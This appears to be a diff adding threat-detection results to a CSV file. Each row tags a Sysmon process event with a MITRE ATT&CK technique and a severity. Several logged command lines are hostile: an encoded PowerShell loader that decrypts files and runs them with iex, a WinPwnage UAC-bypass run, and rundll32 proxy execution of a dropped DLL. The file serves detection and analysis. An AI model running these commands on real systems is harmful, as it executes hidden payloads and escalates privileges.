+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-10-21T16:27:02.319552Z"">
+    </TimeCreated>
+    <EventRecordID>10920364</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5396"" ThreadID=""7692"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-10-21 16:27:02.278</Data>
+    <Data Name=""ProcessGuid"">00247C92-94D6-6171-0000-00100514967B</Data>
+    <Data Name=""ProcessId"">28176</Data>
+    <Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">cscript.exe</Data>
+    <Data Name=""CommandLine"">cscript.exe  //e:jscript testme.js</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\bouss\Desktop\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-3C1A-6169-0000-0020C2790700</Data>
+    <Data Name=""LogonId"">0x779c2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-85C9-6170-0000-001008E62B6B</Data>
+    <Data Name=""ParentProcessId"">24148</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
+    </TimeCreated>
+    <EventRecordID>16438</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
+    <Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
+    <Data Name=""ProcessId"">2168</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
+    <Data Name=""ParentProcessId"">684</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;. )&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.662701Z"">
+    </TimeCreated>
+    <EventRecordID>5931</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.622</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010EF9EFF00</Data>
+    <Data Name=""ProcessId"">3756</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;. )&quot; /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
+    </TimeCreated>
+    <EventRecordID>16438</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
+    <Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
+    <Data Name=""ProcessId"">2168</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
+    <Data Name=""ParentProcessId"">684</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
+    </TimeCreated>
+    <EventRecordID>424175</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
+    <Data Name=""ProcessId"">7504</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
+    <Data Name=""ParentProcessId"">9116</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-05T22:28:20.530062Z"">
+    </TimeCreated>
+    <EventRecordID>2164913</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5424"" ThreadID=""6708"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-05 22:28:20.529</Data>
+    <Data Name=""ProcessGuid"">00247C92-9E04-5F7B-0000-0010CF98272C</Data>
+    <Data Name=""ProcessId"">12876</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
+    <Data Name=""LogonId"">0x391e334</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-9E03-5F7B-0000-0010A645272C</Data>
+    <Data Name=""ParentProcessId"">20228</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mmc.exe&quot; WF.msc</Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:45.491710Z"">
+    </TimeCreated>
+    <EventRecordID>6177</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:45.437</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010122D0C00</Data>
+    <Data Name=""ProcessId"">1636</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">WMI Commandline Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
+    <Data Name=""ParentProcessId"">3876</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
+    </TimeCreated>
+    <EventRecordID>424175</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
+    <Data Name=""ProcessId"">7504</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
+    <Data Name=""ParentProcessId"">9116</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
